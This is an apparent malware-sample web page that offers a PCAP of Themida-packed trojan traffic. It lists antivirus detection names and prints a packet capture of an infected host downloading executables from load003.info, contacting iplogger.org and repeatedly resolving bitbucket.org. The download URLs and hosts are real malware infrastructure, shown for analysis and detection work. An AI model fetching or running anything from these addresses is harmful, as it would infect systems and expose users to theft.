e

Themida Malware Trojan PCAP File Download Traffic Sample

f

Download Attachments

  • 1 pcap load003
    Date added: February 10, 2020 1:07 am Added by: admin File size: 29 MB Downloads: 113

Acronis

Suspicious

Ad-Aware

Trojan.GenericKD.33042201

AegisLab

Trojan.Win32.Stralo.a!c

Alibaba

Packed:Win32/Themida.9b7a1eb0

ALYac

Trojan.GenericKD.33042201

SecureAge APEX

Malicious

Arcabit

Trojan.Generic.D1F82F19

Avast

Win32:Trojan-gen

AVG

Win32:Trojan-gen

Avira (no cloud)

HEUR/AGEN.1038489

BitDefender

Trojan.GenericKD.33042201

CAT-QuickHeal

Trojandownloader.Stralo

CrowdStrike Falcon

Win/malicious_confidence_100% (W)

Cybereason

Malicious.45a019

Cylance

Unsafe

Cyren

W32/Trojan.KCYB-5076

2020-02-08 20:29:34.973179 IP 192.168.86.25.56270 > 47.74.39.61.80: Flags [P.], seq 926682144:926682556, ack 616271298, win 16425, length 412: HTTP: GET /download.php?file=marg.exe HTTP/1.1
E…..@…….V./J’=…P7<. $…P.@).<..GET /download.php?file=marg.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:29:35.825646 IP 192.168.86.25.56271 > 47.74.39.61.80: Flags [P.], seq 2041650194:2041650707, ack 2974115500, win 16425, length 513: HTTP: GET /downfiles/marg.exe HTTP/1.1
E..)..@…….V./J’=…Py….Ef.P.@)._..GET /downfiles/marg.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive
Range: bytes=88624-
Unless-Modified-Since: Sat, 08 Feb 2020 07:20:39 GMT
If-Range: “207000-59e0b57d68e4c”

2020-02-08 20:31:40.028237 IP 192.168.86.25.56278 > 47.74.39.61.80: Flags [P.], seq 2788295783:2788296203, ack 1550571417, win 16425, length 420: HTTP: GET /download.php?file=intervpnmix3.exe HTTP/1.1
E….g@…{|..V./J’=…P.2.g\k..P.@)o…GET /download.php?file=intervpnmix3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:31:40.696479 IP 47.74.39.61.80 > 192.168.86.25.56278: Flags [P.], seq 1:265, ack 420, win 473, length 264: HTTP: HTTP/1.1 302 Found
E..0..@.&…/J’=..V..P..\k…2..P…….HTTP/1.1 302 Found
Date: Sun, 09 Feb 2020 01:32:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: downfiles/intervpnmix3.exe
Content-Length: 0
Connection: close
Content-Type: text/html

2020-02-08 20:31:40.898683 IP 192.168.86.25.56279 > 47.74.39.61.80: Flags [P.], seq 4256677481:4256677893, ack 1750907471, win 16425, length 412: HTTP: GET /downfiles/intervpnmix3.exe HTTP/1.1
E….l@…{…V./J’=…P…ih.OP.@)5…GET /downfiles/intervpnmix3.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:00.483694 IP 192.168.86.25.56280 > 88.99.66.31.443: Flags [P.], seq 2851029055:2851029171, ack 190420779, win 16425, length 116
E…..@…2…V.XcB…….@?.Y.+P.@).B……o…k..^..e.=)KOZ.9e..i….Zr..dG.e^u.s…./.5…
….. .
.2.8…….*…………..iplogger.org.
…………..
2020-02-08 20:32:00.517109 IP 192.168.86.25.56282 > 18.205.93.0.443: Flags [P.], seq 4200830805:4200830931, ack 4038506366, win 16425, length 126
E…..@……V…]……c.U…~P.@)……..y…u..^..e+..!C.5..y.2…6.R…:../6……/.5…
….. .
.2.8…….4…………..bitbucket.org……….

2020-02-08 20:32:05.244099 IP 192.168.86.25.56285 > 47.74.39.61.80: Flags [P.], seq 1035006904:1035007323, ack 886778176, win 16425, length 419: HTTP: GET /download.php?file=intervpnmix2.ex HTTP/1.1
E….
@…s…V./J’=…P=…4.)@P.@)….GET /download.php?file=intervpnmix2.ex HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:05.608904 IP 47.74.39.61.80 > 192.168.86.25.56279: Flags [P.], seq 8624445:8625737, ack 412, win 473, length 1292: HTTP
E..4.x@.’.1./J’=..V..P..h.S…..P…ZM..#.3..#..V..-….
Hk.LT……&t…uQ..p;”..U8l.MJ..h..Y…..W……………lH..h!>X..00.~..$..YvC….E..i.;.n..Z.vnn..Y……….{….. ..V
…2s
.a..aX[…?.[9.(r=.^:f…..!(……]O.Z..o.LB..-.:W.1…………….|pp..x..[..o.........Q..4....G.y.O.$.q..nt6...d..D;b....?8.....K.Z0{.......H..40....=..h.O..F.J..Jii.\..Sn@.9...../......Q."....W....}.X(.o5.. ..\.....b.'Z..{..4@...3. .,@.......W...... ...\.O......P..8.6...g.!..Z.(./..'.m...Cm@+. Q.Z..p.q!v..b!K.....u%5A9d......dP.?.v.w.:Kt..D......E….f.hn..f…..5..s.U..vPO.^d….AGk..h+….*….K..zAZ…UB.3..k…l.t..(..Y…nP..:..].N5…?;~.h.t……..S….H…m.p7…~..b……V49BM….ei……….. [..ai…x…..)..|………._.s.=}.d..t..s,!…t..K….6.AB….U.+.OY.+{.)…pr.Y[._….f..>.A..%..@$.55...D..&~.k4....j...#c.ciQ...U.?...c.R..t..X.xrt..\...Lk....{....$od.i..<.# /..L.W........._.f.(...6W.v...*.0.U...<..,B..x..(.x.K.Dz.......Q..P..O..W..cn...M...p.........}...-.0j.xO.....n.v..........J....0$.b..x.....G...F....|.....S.9....SSm...r...&.......R;.}...VF.X&:x.....UmS.B..x...^;.4....y.>/i......~....g> ..&..*h...z...XJAc-\9M.A..%..x+~.OBmFb.{...@...!...j....f......#)…..#^.6….r.b..y..S....Ws.8a:.....}p....=3......pL.P......|.B…..nv..a…..J… .i.9.z.7..C..1..^G.Fc….+.<..M..K 2020-02-08 20:32:05.916414 IP 47.74.39.61.80 > 192.168.86.25.56285: Flags [P.], seq 1:250, ack 419, win 473, length 249: HTTP: HTTP/1.1 200 OK
E..!..@.&…/J’=..V..P..4.)@=..[P…….HTTP/1.1 200 OK
Date: Sun, 09 Feb 2020 01:32:53 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 25
Connection: close
Content-Type: text/html

This file does not exist!
2020-02-08 20:32:06.451307 IP 192.168.86.25.56286 > 47.74.39.61.80: Flags [P.], seq 1763241117:1763241379, ack 3225483362, win 16425, length 262: HTTP: GET /favicon.ico HTTP/1.1
E….M@…t4..V./J’=…Pi….@.bP.@)….GET /favicon.ico HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:07.098850 IP 47.74.39.61.80 > 192.168.86.25.56286: Flags [P.], seq 1:436, ack 262, win 473, length 435: HTTP: HTTP/1.1 404 Not Found
E….m@.&.!g/J’=..V..P…@.bi…P…….HTTP/1.1 404 Not Found
Date: Sun, 09 Feb 2020 01:32:55 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1


404 Not Found

Not Found

The requested URL /favicon.ico was not found on this server.

2020-02-08 20:32:17.590997 IP 192.168.86.25.56287 > 47.74.39.61.80: Flags [P.], seq 104656042:104656461, ack 2932149013, win 16425, length 419: HTTP: GET /download.php?file=intervpnmix.exe HTTP/1.1
E….i@…s{..V./J’=…P.<……P.@).x..GET /download.php?file=intervpnmix.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:23.439948 IP 192.168.86.25.56288 > 47.74.39.61.80: Flags [P.], seq 2789729861:2789730272, ack 3201016057, win 16425, length 411: HTTP: GET /downfiles/intervpnmix.exe HTTP/1.1
E….n@…s~..V./J’=…P.G.E….P.@)….GET /downfiles/intervpnmix.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:24.157278 IP 192.168.86.25.56289 > 47.74.39.61.80: Flags [P.], seq 3393625816:3393626078, ack 2599973863, win 16425, length 262: HTTP: GET /favicon.ico HTTP/1.1
E….s@…t…V./J’=…P.F….s.P.@):…GET /favicon.ico HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:28.821888 IP 192.168.86.25.56290 > 47.74.39.61.80: Flags [P.], seq 1837030566:1837030982, ack 3108693953, win 16425, length 416: HTTP: GET /download.php?file=intervpn.exe HTTP/1.1
E….x@…so..V./J’=…Pm~…J..P.@) …GET /download.php?file=intervpn.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: load003.info
Connection: Keep-Alive

2020-02-08 20:32:29.505196 IP 47.74.39.61.80 > 192.168.86.25.56290: Flags [P.], seq 1:261, ack 416, win 473, length 260: HTTP: HTTP/1.1 302 Found
E..,.,@.&.0W/J’=..V..P…J..m~.FP…….HTTP/1.1 302 Found
Date: Sun, 09 Feb 2020 01:33:17 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: downfiles/intervpn.exe
Content-Length: 0
Connection: close
Content-Type: text/html

2020-02-08 20:30:51.206549 IP 192.168.86.25.57475 > 192.168.86.1.53: 34777+ A? bitbucket.org. (31)
E..;……….V…V….5.’R…………. bitbucket.org…..
2020-02-08 20:30:51.230165 IP 192.168.86.1.53 > 192.168.86.25.57475: 34777 3/0/0 A 18.205.93.1, A 18.205.93.0, A 18.205.93.2 (79)
E..kv.@.@…..V…V..5…W}+………… bitbucket.org…………..;….]……….;….]……….;….].
2020-02-08 20:31:37.395447 IP 192.168.86.29.57989 > 192.168.86.25.2054: UDP, length 28
E..8M……m..V…V……$.u………..7-..V………V. 2020-02-08 20:32:00.291002 IP 192.168.86.25.61986 > 192.168.86.1.53: 65533+ A? iplogger.org. (30) E..:……...V…V..”.5.&F…………..iplogger.org…..
2020-02-08 20:32:00.316912 IP 192.168.86.1.53 > 192.168.86.25.61986: 65533 1/0/0 A 88.99.66.31 (46)
E..J.W@.@…..V…V..5.”.6^…………..iplogger.org……………..XcB.
2020-02-08 20:32:00.334635 IP 192.168.86.25.54398 > 192.168.86.1.53: 32919+ A? bitbucket.org. (31)
E..;…….Y..V…V..~.5.’e…………. bitbucket.org…..
2020-02-08 20:32:00.366011 IP 192.168.86.1.53 > 192.168.86.25.54398: 32919 3/0/0 A 18.205.93.0, A 18.205.93.1, A 18.205.93.2 (79)
E..k.[@.@…..V…V..5.~.W.r………… bitbucket.org…………..;….]……….;….]……….;….].
2020-02-08 20:32:37.393250 IP 192.168.86.29.50869 > 192.168.86.25.2054: UDP, length 28
E..8M……l..V…V……$3E……….._7-..V………V.
2020-02-08 20:33:20.056272 IP 192.168.86.25.58138 > 192.168.86.1.53: 545+ A? bitbucket.org. (31)
E..; ………V…V….5.’…!………. bitbucket.org…..
2020-02-08 20:33:20.079732 IP 192.168.86.1.53 > 192.168.86.25.58138: 545 3/0/0 A 18.205.93.1, A 18.205.93.0, A 18.205.93.2 (79)
E..k..@.@..;..V…V..5…W.M.!………. bitbucket.org…………..;….]……….;….]……….;….].
2020-02-08 20:33:37.390751 IP 192.168.86.29.52712 > 192.168.86.25.2054: UDP, length 28
E..8M……k..V…V……$,…………_7-..V………V.
2020-02-08 20:34:37.391819 IP 192.168.86.29.61078 > 192.168.86.25.2054: UDP, length 28
E..8M……j..V…V……$.d……….._7-..V………V.
2020-02-08 20:35:33.251100 IP 192.168.86.25.57487 > 192.168.86.1.53: 18385+ A? bitbucket.org. (31)
E..; ……x..V…V….5.’..G……….. bitbucket.org…..
2020-02-08 20:35:33.273069 IP 192.168.86.1.53 > 192.168.86.25.57487: 18385 3/0/0 A 18.205.93.1, A 18.205.93.0, A 18.205.93.2 (79)
E..k.|@.@.O…V…V..5…W.’G……….. bitbucket.org…………..;….]……….;….]……….;….].

Please follow and like us:

Written By

admin

Leave a Reply